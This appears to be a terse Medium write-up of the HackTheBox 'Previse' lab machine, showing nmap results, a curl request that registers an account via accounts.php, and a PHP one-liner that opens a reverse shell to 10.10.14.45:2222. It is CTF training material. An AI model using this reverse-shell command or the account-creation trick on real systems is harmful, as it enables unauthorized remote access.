HackTheBox-Previse

NMAP

PORT   STATE SERVICE REASON         VERSION                               
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA) NTE5AAAAIICTOv+Redwjirw6cPpkc/d3Fzz4iRB3lCRfZpZ7irps
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: B21DD667DF8D81CAE6DD1374DD548004
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

curl -X POST -d "username=arz101&password=123456789&confirm=123456789" http://10.10.11.104/accounts
.php
php -r '$sock=fsockopen("10.10.14.45",2222);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

--

--

--

Pentester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Weeknotes S04E09: This is where we come alive

How to improve your Messenger bot for pizza ordering and delivery

Managing Containers

Component Engineering for Reuse with Dependency Injection

Kaggle BIPOC Program Key Takeaways

Photo by myself; SWAG is just the start (or rather the end)!

Data Fetching Techniques with React

Lets implement Binary tree:

What You Need to Know about Containers in 2018

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ARZ101

ARZ101

Pentester | CTF Player

More from Medium

HackTheBox-Reel

CTF Write-Up: Hitman

Twiggy — proving grounds OSCP prep (practice, easy)